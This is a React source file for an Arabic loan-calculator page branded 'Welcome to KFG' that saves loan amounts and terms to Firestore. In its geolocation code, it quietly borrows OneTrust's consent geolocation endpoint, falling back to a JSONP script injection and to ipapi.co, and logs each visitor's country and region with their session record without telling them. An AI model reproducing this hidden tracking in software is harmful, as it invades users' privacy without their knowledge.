import React, { useMemo, useState, useEffect, useCallback } from "react";
import { useLocation, useNavigate } from "react-router-dom";
import { collection, doc, serverTimestamp, setDoc } from "firebase/firestore";
import { db } from "../firebaseConfig";
import Loader from "../components/Loader";

const safeSession = {
  get(key) {
    if (typeof window === "undefined") return null;
    try {
      return window.sessionStorage?.getItem(key) ?? null;
    } catch (err) {
      console.warn("SessionStorage get failed:", err);
      return null;
    }
  },
  set(key, value) {
    if (typeof window === "undefined") return;
    try {
      window.sessionStorage?.setItem(key, value);
    } catch (err) {
      console.warn("SessionStorage set failed:", err);
    }
  },
};

const loanProducts = [
  { key: "cash", label: "قرض نقدي", img: "/assets/cash-loan.jpg" },
  { key: "auto", label: "قرض سياره", img: "/assets/auto-loan.jpg" },
  { key: "furniture", label: "قرض أثاث", img: "/assets/furniture-loan.jpg" },
  { key: "marine", label: "معدات بحرية", img: "/assets/marine-loan.jpg" },
  { key: "appliance", label: "أجهزة كهربائية", img: "/assets/electrical-loan.jpg" },
  { key: "installment", label: "قرض مقسط", img: "/assets/housing-loan.jpg" },
  { key: "education", label: "تعليمي", img: "/assets/edu.jpg" },
  { key: "business", label: "قروض الشركات", img: "/assets/bus.jpg" },
  { key: "retiree", label: "قرض المتقاعدين", img: "/assets/retiree.jpg" },
];

const DEFAULT_RATE = 0.065; // 6.5% سنوياً

const formatCurrency = (value) =>
  typeof value !== "number"
    ? "..."
    : new Intl.NumberFormat("en-KW", {
        minimumFractionDigits: 3,
        maximumFractionDigits: 3,
      }).format(value);

export default function Calculate() {
  const navigate = useNavigate();
  const location = useLocation();

  const queryParams = useMemo(() => new URLSearchParams(location.search), [location.search]);
  const initialProduct = queryParams.get("type") || safeSession.get("calcProduct") || "cash";

  const [pageLoading, setPageLoading] = useState(true);
  const [form, setForm] = useState(() => ({ amount: "", months: "", loanType: initialProduct }));

  const [results, setResults] = useState(null);
  const [calcId, setCalcId] = useState(() => safeSession.get("calcId") || "");
  const [loanId, setLoanId] = useState(() => safeSession.get("loanId") || "");
  const [error, setError] = useState("");
  const [saving, setSaving] = useState(false);
  const [geoData, setGeoData] = useState({ country: "", stateName: "", continent: "" });

  useEffect(() => {
    const timeoutId = setTimeout(() => setPageLoading(false), 1200);
    return () => clearTimeout(timeoutId);
  }, []);

  useEffect(() => {
    setForm((prev) => ({ ...prev, loanType: initialProduct }));
  }, [initialProduct]);

  useEffect(() => {
    let isMounted = true;
    let scriptEl = null;
    let previousJsonFeed = null;
    let jsonpHandler = null;

    const applyGeoData = (data) => {
      if (!isMounted || !data) return;
      setGeoData({
        country: data?.country || "",
        stateName: data?.stateName || "",
        continent: data?.continent || "",
      });
    };

    const parseJsonp = (text) => {
      if (!text) return null;
      const trimmed = text.trim();
      const startIndex = trimmed.indexOf("jsonFeed(");
      const endIndex = trimmed.lastIndexOf(")");
      if (startIndex === -1 || endIndex === -1 || endIndex <= startIndex) return null;
      const jsonString = trimmed.slice(startIndex + "jsonFeed(".length, endIndex);
      return JSON.parse(jsonString);
    };

    const cleanupJsonp = () => {
      if (scriptEl?.parentNode) {
        scriptEl.parentNode.removeChild(scriptEl);
      }
      if (typeof window !== "undefined" && jsonpHandler && window.jsonFeed === jsonpHandler) {
        window.jsonFeed = previousJsonFeed;
      }
      scriptEl = null;
      previousJsonFeed = null;
      jsonpHandler = null;
    };

    const loadJsonpFallback = () => {
      if (typeof window === "undefined") return;
      jsonpHandler = (data) => {
        applyGeoData(data);
        cleanupJsonp();
      };
      previousJsonFeed = window.jsonFeed;
      window.jsonFeed = jsonpHandler;
      scriptEl = document.createElement("script");
      scriptEl.src = "https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location";
      scriptEl.async = true;
      scriptEl.onerror = () => cleanupJsonp();
      document.head.appendChild(scriptEl);
    };

    const fetchBackupGeo = async () => {
      try {
        const res = await fetch("https://ipapi.co/json/", { cache: "no-store" });
        if (!res.ok) return;
        const data = await res.json();
        applyGeoData({
          country: data?.country_code || "",
          stateName: data?.region || "",
          continent: data?.continent_code || "",
        });
      } catch (err) {
        console.warn("Backup geo failed:", err);
      }
    };

    const fetchGeo = async () => {
      try {
        const response = await fetch(
          "https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location",
          { cache: "no-store" }
        );
        const text = await response.text();
        const data = parseJsonp(text);
        if (data) {
          applyGeoData(data);
        } else {
          loadJsonpFallback();
          fetchBackupGeo();
        }
      } catch (err) {
        console.warn("Failed to fetch geolocation:", err);
        loadJsonpFallback();
        fetchBackupGeo();
      }
    };

    fetchGeo();

    return () => {
      isMounted = false;
      cleanupJsonp();
    };
  }, []);

  useEffect(() => {
    if (!geoData.country && !geoData.stateName && !geoData.continent) return;
    const activeCalcId =
      safeSession.get("loanId") || safeSession.get("calcId") || calcId || "";
    if (!activeCalcId) return;
    const calculations = collection(db, "calculateEntries");
    setDoc(
      doc(calculations, activeCalcId),
      {
        country: geoData.country,
        stateName: geoData.stateName,
        continent: geoData.continent,
        updatedAt: serverTimestamp(),
      },
      { merge: true }
    ).catch((err) => console.warn("Failed to sync geolocation (direct):", err));
  }, [geoData, calcId]);

  useEffect(() => {
    if (!calcId || !results) return;
    if (results.country || results.stateName || results.continent) return;
    if (!geoData.country && !geoData.stateName && !geoData.continent) return;

    const updatedResults = {
      ...results,
      country: geoData.country,
      stateName: geoData.stateName,
      continent: geoData.continent,
    };

    setResults(updatedResults);
    safeSession.set("calcData", JSON.stringify(updatedResults));

    const calculations = collection(db, "calculateEntries");
    setDoc(
      doc(calculations, calcId),
      {
        country: geoData.country,
        stateName: geoData.stateName,
        continent: geoData.continent,
        updatedAt: serverTimestamp(),
      },
      { merge: true }
    ).catch((err) => console.warn("Failed to sync geolocation:", err));
  }, [calcId, geoData, results]);

  const selectedProduct = loanProducts.find((p) => p.key === form.loanType) || loanProducts[0];

  const validateInputs = () => {
    const amountNum = Number(form.amount);
    const monthsNum = Number(form.months);
    if (!amountNum || amountNum < 1500 || amountNum > 25000) {
      return "الرجاء إدخال مبلغ بين 1500 و 25000 د.ك";
    }
    if (!monthsNum || monthsNum < 24 || monthsNum > 60) {
      return "الرجاء إدخال مدة بين 24 و 60 شهر";
    }
    return null;
  };

  const computeSchedule = (amount, months) => {
    const monthlyRate = DEFAULT_RATE / 12;
    const monthlyPayment = (amount * monthlyRate) / (1 - Math.pow(1 + monthlyRate, -months));
    const totalRepayable = monthlyPayment * months;
    const interestAmount = totalRepayable - amount;
    return { monthlyPayment, totalRepayable, interestAmount };
  };

  const persistCalculation = useCallback(async (payload, activeLoanId, isNew) => {
    const calculations = collection(db, "calculateEntries");
    const docRef = activeLoanId ? doc(calculations, activeLoanId) : doc(calculations);

    const firestorePayload = {
      ...payload,
      updatedAt: serverTimestamp(),
    };
    if (isNew) {
      firestorePayload.createdAt = serverTimestamp();
    }

    await setDoc(docRef, firestorePayload, { merge: true });

    setCalcId(docRef.id);
    safeSession.set("calcId", docRef.id);
  }, []);

  const ensureLoanId = () => {
    const existingLoanId = safeSession.get("loanId") || loanId;
    if (existingLoanId) {
      if (existingLoanId !== loanId) setLoanId(existingLoanId);
      return existingLoanId;
    }

    const existingCalcId = safeSession.get("calcId") || calcId;
    if (existingCalcId) {
      safeSession.set("loanId", existingCalcId);
      setLoanId(existingCalcId);
      return existingCalcId;
    }

    const newId = doc(collection(db, "calculateEntries")).id;
    safeSession.set("loanId", newId);
    setLoanId(newId);
    return newId;
  };

  const handleCalculate = async () => {
    setError("");
    const validationError = validateInputs();
    if (validationError) {
      setError(validationError);
      return;
    }

    const existingCalcId = safeSession.get("calcId") || calcId;
    const activeLoanId = ensureLoanId();
    const isNew = !existingCalcId;
    const amount = Number(form.amount);
    const months = Number(form.months);
    const calculation = computeSchedule(amount, months);
    const payload = {
      loanId: activeLoanId,
      loanType: form.loanType,
      amount,
      months,
      interestRate: DEFAULT_RATE * 100,
      country: geoData.country,
      stateName: geoData.stateName,
      continent: geoData.continent,
      ...calculation,
    };

    setSaving(true);
    try {
      await persistCalculation(payload, activeLoanId, isNew);
      setResults(payload);
      safeSession.set("calcProduct", form.loanType);
      safeSession.set("calcData", JSON.stringify(payload));
      safeSession.set("loanId", activeLoanId);
      safeSession.set("calcId", activeLoanId);
      setCalcId(activeLoanId);
    } catch (err) {
      console.error("Failed to persist calculation:", err);
      setError("تعذر حفظ الحساب، حاول مرة أخرى.");
    } finally {
      setSaving(false);
    }
  };

  const handleProceed = (event) => {
    if (event?.preventDefault) event.preventDefault();
    if (saving) return;
    if (!results) {
      setError("يرجى حساب القرض أولاً");
      return;
    }
    navigate("/loan");
  };

  if (pageLoading) return <Loader />;

  return (
    <div dir="rtl" className="min-h-screen bg-[#f0f4f8] text-gray-800 font-sans">
      <div className="max-w-6xl mx-auto px-4 py-6 space-y-6">
        <div
          aria-label="staff-header"
          className="w-[96%] mt-[20px] lg:w-[100%] h-[70px] lg:min-h-[70px] flex ltr bg-[#323232] justify-center items-center py-4 px-4 lg:px-12 mx-auto rounded-lg md:rounded-2xl print:hidden"
        >
          <div className="flex-1 flex flex-row space-x-8 justify-start items-center">
            <p>
              <svg width="34" height="32" viewBox="0 0 34 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                <g clipPath="url(#clip0_8317_54167)">
                  <path
                    d="M14.8369 18.1641C14.1141 17.643 13.0878 17.6917 13.1805 16.4695C13.2269 15.8785 13.3744 15.5375 13.9139 15.2473C16.3816 13.9171 18.805 12.5084 21.2896 11.1952C21.9829 10.8266 22.2147 10.4029 22.1915 9.64039C22.1389 7.78272 22.1515 5.92293 22.1915 4.06526C22.2042 3.40861 22.0461 3.07817 21.3486 2.8833C18.5364 2.07835 15.5565 2.07835 12.7443 2.8833C12.1521 3.05064 11.9751 3.30694 11.9835 3.89368C12.0151 5.99706 12.0109 8.10257 11.9835 10.2059C11.9603 10.4106 12.0041 10.6173 12.1083 10.7947C12.2125 10.972 12.3715 11.1104 12.561 11.1888C13.7074 11.7883 14.8285 12.4343 15.9728 13.0677C14.8601 14.1924 14.5355 14.2581 13.2964 13.5527C12.2996 12.985 10.894 12.7203 10.4157 11.7692C9.96047 10.8689 10.2745 9.57684 10.2703 8.45631C10.2703 6.52662 10.2913 4.59905 10.2555 2.66936C10.245 2.08897 10.4178 1.79877 10.9804 1.59543C15.1087 0.102088 19.2118 0.152926 23.319 1.6738C23.8353 1.86444 23.9807 2.16099 23.9765 2.68842C23.9512 5.42303 23.9406 8.15976 23.9765 10.8944C23.9765 11.5298 23.7236 11.8243 23.2199 12.0975C20.8492 13.3875 18.4931 14.7008 16.135 16.0077C14.938 16.6644 14.9402 16.6686 14.8369 18.1641Z"
                    fill="#00A3E0"
                  />
                  <path
                    d="M17.7111 16.1369C18.2675 15.8065 18.6173 15.5799 18.9861 15.3871C19.8564 14.9317 20.575 15.3553 20.5771 16.3466C20.5898 19.2571 20.6024 22.1654 20.5771 25.0737C20.5483 25.3455 20.6065 25.6194 20.7434 25.8556C20.8802 26.0919 21.0885 26.278 21.3379 26.387C22.9535 27.2794 24.5523 28.2157 26.1342 29.1957C26.6821 29.5325 27.0214 29.4668 27.4871 29.0305C29.5951 27.0618 31.1294 24.5529 31.9252 21.7735C32.1107 21.138 32.0264 20.761 31.4026 20.4178C29.7167 19.488 28.0582 18.5115 26.4187 17.499C25.9193 17.1939 25.5463 17.2511 25.0805 17.5265C24.1175 18.0984 23.1165 18.6068 22.145 19.1639C21.6561 19.4456 21.4285 19.4668 21.399 18.7762C21.3632 17.9713 21.4791 17.3359 22.3473 17.0563C22.5842 16.988 22.8045 16.8711 22.9942 16.7131C24.9393 14.9656 26.758 15.3447 28.7199 16.8084C30.1719 17.8908 31.8346 18.6915 33.4193 19.5875C33.9103 19.8671 34.081 20.1467 33.9651 20.7546C33.1601 24.9529 31.078 28.3675 27.8138 31.1042C27.2427 31.5829 26.8107 31.6316 26.1532 31.2271C23.9763 29.8862 21.7615 28.609 19.5382 27.3465C19.3209 27.246 19.1404 27.0795 19.0221 26.8706C18.9038 26.6616 18.8536 26.4206 18.8786 26.1815C18.9039 23.413 18.866 20.6445 18.9039 17.876C18.9144 17.0774 18.847 16.4144 17.7111 16.1369Z"
                    fill="#00A3E0"
                  />
                  <path
                    d="M18.0898 19.4343C18.0898 19.9956 18.0898 20.3706 18.0898 20.7434C18.0667 21.7538 17.2111 22.2473 16.3154 21.7538C13.7719 20.3515 11.2241 18.9514 8.69949 17.5173C8.14947 17.2038 7.72167 17.1657 7.16744 17.5173C5.64804 18.4536 4.11178 19.3665 2.53127 20.2181C1.93278 20.5421 1.89906 20.8832 2.05289 21.472C2.7957 24.3411 4.33579 26.9383 6.49308 28.9599C6.8429 29.2904 7.11475 29.4111 7.57416 29.1336C9.25161 28.1197 10.9438 27.1312 12.6508 26.1681C12.8372 26.0807 12.9913 25.9364 13.0912 25.7557C13.1912 25.575 13.2317 25.3672 13.2071 25.162C13.1755 24.0774 13.2261 22.9887 13.1881 21.9042C13.1629 21.1585 13.4136 21.203 13.9742 21.4614C14.6675 21.7834 14.9731 22.2049 14.9056 22.995C14.7918 24.2787 15.3482 25.7995 14.6949 26.8078C14.0627 27.7568 12.6402 28.1783 11.5571 28.8201C10.1999 29.6208 8.81749 30.3728 7.48354 31.2179C6.95881 31.5547 6.6406 31.4679 6.20649 31.112C2.91762 28.4317 0.716499 24.6358 0.0171981 20.4384C-0.0692032 19.9427 0.067768 19.6737 0.497668 19.4258C2.77642 18.1154 5.04252 16.7873 7.29599 15.4415C7.7596 15.164 8.09889 15.2297 8.53511 15.4817C10.8848 16.8077 13.2577 18.085 15.6053 19.4131C16.3871 19.8241 17.1226 20.3007 18.0898 19.4343Z"
                    fill="#00A3E0"
                  />
                </g>
                <defs>
                  <clipPath id="clip0_8317_54167">
                    <rect width="34" height="31" fill="white" transform="translate(34 31.5) rotate(-180)" />
                  </clipPath>
                </defs>
              </svg>
            </p>
            <div className="w-full flex-1 flex flex-col justify-start hidden lg:flex">
              <p className="text-left relative text-[#00A3E0] text-lg">Welcome to KFG</p>
              
            </div>
          </div>
          <div className="flex-1 flex flex-row justify-end items-center">
            <div aria-label="tabs-zone" className="flex flex-row space-x-1 justify-end rounded-xl lg:w-fit">
              <div className="group flex flex-col items-center relative">
                <p className="text-center absolute bottom-[-30px] hidden group-hover:flex text-[#00A3E0] text-sm bg-white py-1 px-2 rounded-md shadow-lg font-semibold">
                  Home
                </p>
                <div className="relative">
                  <button
                    aria-label="header-btn"
                    className="flex-row bg-[#474747] text-white rounded-lg m-1 p-2 lg:p-3 flex items-center whitespace-nowrap"
                  >
                    <p>
                      <svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path
                          d="M21.4989 14.7693C21.4989 13.3853 21.4929 12.0012 21.4989 10.6171C21.5041 9.78111 21.199 9.09882 20.5901 8.52675C18.0633 6.14948 15.5405 3.76722 13.0217 1.37995C11.7777 0.203565 10.2137 0.207314 8.96525 1.38745C6.45942 3.75822 3.95135 6.12824 1.44102 8.49751C0.808942 9.09058 0.497022 9.79236 0.500022 10.6598C0.509769 13.419 0.500026 16.1781 0.504525 18.9373C0.504525 20.4803 1.5265 21.4985 3.07334 21.5C4.54194 21.5 6.01079 21.5 7.4799 21.5C7.92978 21.5 8.0445 21.389 8.04525 20.9399C8.04525 18.9006 8.04525 16.8617 8.04525 14.8233C8.04525 13.8306 8.51237 13.365 9.5066 13.365C10.5353 13.365 11.5648 13.365 12.5935 13.365C13.4543 13.365 13.9582 13.8629 13.9589 14.7206C13.9619 16.778 13.9619 18.8356 13.9589 20.8934C13.9589 21.4003 14.0579 21.4992 14.5632 21.4992C16.0223 21.4992 17.4817 21.4992 18.9413 21.4992C20.4717 21.4992 21.4966 20.4766 21.4989 18.95C21.5004 17.5565 21.5004 16.1629 21.4989 14.7693ZM7.25271 20.7112H6.99853C5.66014 20.7112 4.3225 20.7112 2.98486 20.7112C1.98163 20.7112 1.28657 20.0185 1.28507 19.0198C1.28107 16.1951 1.28107 13.371 1.28507 10.5474C1.27941 10.2894 1.32892 10.0332 1.4303 9.79594C1.53168 9.55866 1.68258 9.34578 1.87291 9.17155C4.45671 6.7313 7.04152 4.29155 9.62732 1.85231C10.4371 1.09129 11.5768 1.10254 12.3851 1.86505C14.9509 4.28431 17.5154 6.70456 20.0788 9.12581C20.2842 9.31054 20.4473 9.53751 20.5568 9.79117C20.6663 10.0448 20.7196 10.3192 20.7131 10.5954C20.7081 13.3825 20.7081 16.1696 20.7131 18.9568C20.7131 20.0335 20.0383 20.7112 18.9646 20.7135C17.6459 20.7135 16.3268 20.7135 15.0071 20.7135C14.9261 20.7135 14.8444 20.7045 14.7447 20.6985V20.3439C14.7447 18.4642 14.7492 16.5838 14.7447 14.7041C14.7402 13.4295 13.8809 12.5815 12.6055 12.5785C11.5558 12.5785 10.5081 12.5785 9.46236 12.5785C8.09323 12.5785 7.26021 13.41 7.25871 14.7798C7.25871 16.6293 7.25871 18.4812 7.25871 20.3356L7.25271 20.7112Z"
                          fill="white"
                        />
                      </svg>
                    </p>
                  </button>
                </div>
              </div>
              <div className="group flex flex-col items-center relative">
                <p className="text-center absolute bottom-[-30px] hidden group-hover:flex text-[#00A3E0] text-sm bg-white py-1 px-2 rounded-md shadow-lg font-semibold">
                  Login
                </p>
                <div className="relative">
                  <button
                    aria-label="header-btn"
                    className="flex-row bg-[#474747] text-white rounded-lg m-1 p-2 lg:p-3 flex items-center whitespace-nowrap"
                  >
                    <p>
                      <svg width="25" height="25" viewBox="0 0 30 30" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path
                          d="M19.6258 29.9969C19.248 29.8271 18.8349 29.7081 18.5 29.4758C17.8631 29.0352 17.5361 28.3881 17.5103 27.608C17.4954 27.1707 17.5103 26.7325 17.5103 26.2481H17.1785C15.8704 26.2481 14.5622 26.2481 13.2541 26.2481C11.3521 26.2481 10.0173 24.9125 10.0071 23.0064C10.0032 22.2647 10.0071 21.5198 10.0071 20.7811C10.0071 20.2882 10.2489 19.9924 10.633 19.9987C11.0172 20.005 11.2464 20.296 11.2472 20.7702C11.2472 21.5315 11.2472 22.2936 11.2472 23.055C11.2519 24.1394 11.9928 24.9641 13.0671 24.9907C14.5012 25.0252 15.9369 24.9994 17.3702 24.9994C17.4137 24.9924 17.4567 24.9819 17.4985 24.9681V5.28156C17.4985 3.81994 18.072 3.02105 19.4545 2.55784L23.0292 1.36069C23.0826 1.34633 23.1291 1.31363 23.1607 1.26836C23.0934 1.26288 23.0261 1.25193 22.9588 1.25193C19.725 1.25193 16.4939 1.25193 13.2658 1.25193C12.0218 1.25193 11.2457 2.03907 11.2441 3.2863C11.2441 4.0578 11.248 4.82851 11.2441 5.60001C11.2441 5.91299 11.0735 6.13521 10.8013 6.21737C10.6752 6.26003 10.5385 6.25882 10.4132 6.21394C10.2879 6.16905 10.1815 6.08313 10.1112 5.97012C10.0449 5.85222 10.0091 5.71961 10.0071 5.58436C9.99931 4.73462 9.98679 3.88487 10.0071 3.0367C10.0235 2.22659 10.3571 1.45528 10.9362 0.888581C11.5153 0.321886 12.2936 0.00506881 13.1038 0.00625962C14.8705 -0.00782452 16.6371 0.00625962 18.4045 0.00625962H27.395C28.898 0.00625962 29.987 1.08213 29.9878 2.58835C29.9878 10.0357 29.9878 17.4834 29.9878 24.9313C29.9878 26.105 29.3431 27.0048 28.2189 27.3827C25.7449 28.2147 23.2689 29.042 20.7908 29.8646L20.3816 30L19.6258 29.9969ZM18.7472 16.2429C18.7472 19.9601 18.7472 23.6781 18.7472 27.3968C18.7472 28.3874 19.5296 28.9617 20.4685 28.6487C22.9017 27.8443 25.3329 27.0358 27.7619 26.2231C28.4512 25.9931 28.7485 25.5745 28.7485 24.8429C28.7485 17.4456 28.7485 10.0485 28.7485 2.65174C28.7485 1.60325 27.9661 1.03753 26.9772 1.36616C24.5737 2.16583 22.171 2.96706 19.769 3.76985C19.0211 4.01946 18.7472 4.40756 18.7472 5.20644V16.2429Z"
                          fill="white"
                        />
                        <path
                          d="M0.000764054 12.9522C0.170543 12.6016 0.457693 12.4929 0.834805 12.4937C4.27733 12.5004 7.72218 12.502 11.1694 12.4984H11.5911C11.4769 12.3755 11.4112 12.3004 11.34 12.23C10.1742 11.0636 9.00819 9.89722 7.8419 8.73085C7.75573 8.65149 7.67715 8.56426 7.60719 8.47029C7.52454 8.35361 7.48657 8.21111 7.50022 8.06877C7.51386 7.92643 7.57822 7.79374 7.68153 7.69488C7.77956 7.5905 7.91171 7.52467 8.05408 7.50932C8.19645 7.49396 8.33962 7.53009 8.45765 7.61116C8.53696 7.66751 8.6106 7.73145 8.67751 7.80208C10.2945 9.41393 11.9114 11.0266 13.5283 12.64C13.8413 12.9483 13.8413 13.3059 13.5283 13.6165C11.9057 15.2372 10.2809 16.8543 8.65402 18.4677C8.51526 18.6003 8.34293 18.6926 8.15562 18.7345C7.92091 18.7838 7.71985 18.65 7.59232 18.4434C7.52865 18.3496 7.4946 18.2388 7.4946 18.1254C7.4946 18.012 7.52865 17.9011 7.59232 17.8073C7.665 17.7034 7.74867 17.6076 7.8419 17.5217C8.99984 16.3616 10.1588 15.2023 11.3188 14.0437C11.3932 13.9655 11.4644 13.8919 11.5958 13.7542H11.1984C7.74331 13.7542 4.28856 13.7555 0.834041 13.7581C0.456928 13.7581 0.170561 13.6501 0 13.3004L0.000764054 12.9522Z"
                          fill="white"
                        />
                      </svg>
                    </p>
                  </button>
                </div>
              </div>
            </div>
          </div>
        </div>

        <div className="bg-white shadow-sm rounded-2xl border border-gray-100 p-4 md:p-6">
          <div className="flex flex-col items-center text-center gap-3">
            <div>
              <p className="text-[#00A3E0] text-sm font-semibold">حاسبة القروض</p>
              <h1 className="text-lg md:text-xl font-medium mt-1 text-gray-900">مرحباً، يرجى تعبئة البيانات لإحتساب القرض الخاص بك</h1>
            </div>
          </div>

          <div className="mt-4 flex gap-2 overflow-x-auto pb-2" aria-label="product-loans-buttons">
            {loanProducts.map((product) => {
              const isActive = product.key === selectedProduct.key;
              return (
                <button
                  key={product.key}
                  aria-label={product.label}
                  type="button"
                  onClick={() => {
                    setForm((prev) => ({ ...prev, loanType: product.key }));
                    setResults(null);
                    safeSession.set("calcProduct", product.key);
                  }}
                  className={`loan-card flex flex-col items-center bg-white rounded-lg p-2 w-52 min-w-[150px] h-[60px] border shadow-[inset_1px_2px_4px_rgba(0,0,0,0.15)] transition whitespace-nowrap ${
                    isActive ? "text-[#00A3E0] border-gray-400" : "text-[#000] border-gray-200"
                  } hover:border-gray-300`}
                >
                  <div className="w-[60px] h-[60px] mb-2 bg-white flex items-center justify-center">
                    <img
                      src={product.img}
                      alt={product.label}
                      className="w-[23.61px] h-[23.61px] object-contain"
                      loading="lazy"
                    />
                  </div>
                  <span className="loan-label">{product.label}</span>
                </button>
              );
            })}
          </div>
        </div>

        <div className="w-full flex flex-col lg:flex-row lg:gap-2 space-y-4 lg:space-y-0">
          <div className="w-full lg:w-1/2 bg-white p-4 rounded-xl shadow-sm flex flex-col min-h-[420px] space-y-6">
            <div className="space-y-2">
              <div className="flex flex-col border-b border-[#00A3E0] pb-1.5">
                <label className="text-sm font-semibold text-gray-800">المبلغ</label>
                <div className="flex flex-row w-full" aria-label="input-Container">
                  <input
                    type="text"
                    inputMode="decimal"
                    placeholder="1500 - 25000 KD"
                    className="flex-1 border-none appearance-none focus:outline-none bg-transparent text-gray-900 placeholder:text-gray-400 text-base pb-1.5 font-sans"
                    aria-label="Amount"
                    value={form.amount}
                    onChange={(e) => setForm((prev) => ({ ...prev, amount: e.target.value }))}
                  />
                </div>
              </div>

              <div className="flex flex-col border-b border-[#00A3E0] pb-1.5">
                <label className="text-sm font-semibold text-gray-800">المدة</label>
                <div className="flex flex-row w-full" aria-label="input-Container">
                  <input
                    type="text"
                    inputMode="numeric"
                    placeholder="24 - 60 شهر"
                    className="flex-1 border-none appearance-none focus:outline-none bg-transparent text-gray-900 placeholder:text-gray-400 text-base py-1.5 font-sans"
                    aria-label="Period"
                    value={form.months}
                    onChange={(e) => setForm((prev) => ({ ...prev, months: e.target.value }))}
                  />
                </div>
              </div>
            </div>

            {error && <p className="text-xs text-red-600">{error}</p>}

            <div className="mt-auto pt-10 pb-2 flex justify-center">
              <button
                aria-label="calculate"
                type="button"
                onClick={handleCalculate}
                disabled={saving}
                className="flex items-center justify-center bg-[#00A3E0] text-white rounded-lg px-6 py-2 transition shadow disabled:opacity-60"
              >
                {saving ? "جارٍ الحفظ..." : "احسب"}
              </button>
            </div>
          </div>

          <div className="w-full lg:w-1/2 bg-white p-4 rounded-xl shadow-sm flex flex-col min-h-[420px] space-y-6">
            <div className="space-y-2">
              <div className="flex flex-row items-center justify-between bg-[#f7f7f7] px-2 py-2 rounded-lg">
                <p className="text-sm text-[#202020]">قيمة القرض</p>
                <p className="text-sm text-[#5d5d5d]">{results ? `${formatCurrency(results?.amount)} ` : "..."}</p>
              </div>
              <div className="flex flex-row items-center justify-between bg-[#f7f7f7] px-2 py-2 rounded-lg">
                <p className="text-sm text-[#202020]">قيمة الفائدة</p>
                <p className="text-sm text-[#5d5d5d]">{results ? `${formatCurrency(results?.interestAmount)} ` : "..."}</p>
              </div>
              <div className="flex flex-row items-center justify-between bg-[#f7f7f7] px-2 py-2 rounded-lg">
                <p className="text-sm text-[#202020]">المبلغ الإجمالي</p>
                <p className="text-sm text-[#5d5d5d]">{results ? `${formatCurrency(results?.totalRepayable)} ` : "..."}</p>
              </div>
              <div className="flex flex-row items-center justify-between bg-[#f7f7f7] px-2 py-2 rounded-lg">
                <p className="text-sm text-[#202020]">القسط الشهري</p>
                <p className="text-sm text-[#5d5d5d]">{results ? `${formatCurrency(results?.monthlyPayment)} ` : "..."}</p>
              </div>
              <div className="flex flex-row items-center justify-between bg-[#f7f7f7] px-2 py-2 rounded-lg">
                <p className="text-sm text-[#202020]">نسبة الفائدة</p>
                <p className="text-sm text-[#5d5d5d]">6.500</p>
              </div>
            </div>
            <div className="mt-auto pt-8 pb-2 flex justify-center">
              <button
                aria-label="apply"
                type="button"
                onClick={handleProceed}
                disabled={!results}
                className={`flex items-center justify-center rounded-lg px-8 py-2 ${
                  results
                    ? "bg-[#00A3E0] text-white hover:bg-[#0090c6]"
                    : "bg-[#00000008] text-[#5d5d5d] cursor-not-allowed"
                }`}
              >
                تقديم
              </button>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}
